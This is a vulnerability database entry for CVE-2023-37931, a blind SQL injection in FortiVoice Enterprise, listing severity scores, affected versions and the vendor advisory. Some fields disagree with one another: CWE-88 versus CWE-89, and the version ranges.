CVE-2023-37931

High

Published: 14 January 2025

Published

14 January 2025

Modified

22 July 2025

KEV Added

—

Patch

—

CVSS Score 8.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS Score 0.0044 63.0th percentile

Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Description

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability [CWE-88] in FortiVoice Entreprise version 7.0.0 through 7.0.1 and before 6.4.8 allows an authenticated attacker to perform a blind sql injection attack via sending crafted HTTP or HTTPS requests

Security Summary

CVE-2023-37931 is a SQL injection vulnerability (CWE-89) in FortiVoice Enterprise versions 7.0.0 through 7.0.1 and before 6.4.8. The flaw stems from improper neutralization of special elements used in an SQL command, allowing an authenticated attacker to execute a blind SQL injection attack by sending crafted HTTP or HTTPS requests. It has a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), indicating high severity due to its potential for significant impact.

An attacker requires low-privilege authenticated access (PR:L) to exploit the vulnerability over the network (AV:N) with low attack complexity and no user interaction. Exploitation enables a blind SQL injection, potentially allowing the attacker to extract sensitive data, modify database contents, or disrupt system availability, achieving high levels of confidentiality, integrity, and availability impact.

The FortiGuard PSIRT advisory FG-IR-23-220 provides details on mitigation and patches; security practitioners should consult https://fortiguard.com/psirt/FG-IR-23-220 for upgrade guidance and remediation steps.

Details

CWE(s): CWE-89

Affected Products

fortinet

fortivoice

6.0.0 — 6.4.9 · 7.0.0 — 7.0.2

References

https://fortiguard.com/psirt/FG-IR-23-220
Vendor Advisory · psirt@fortinet.com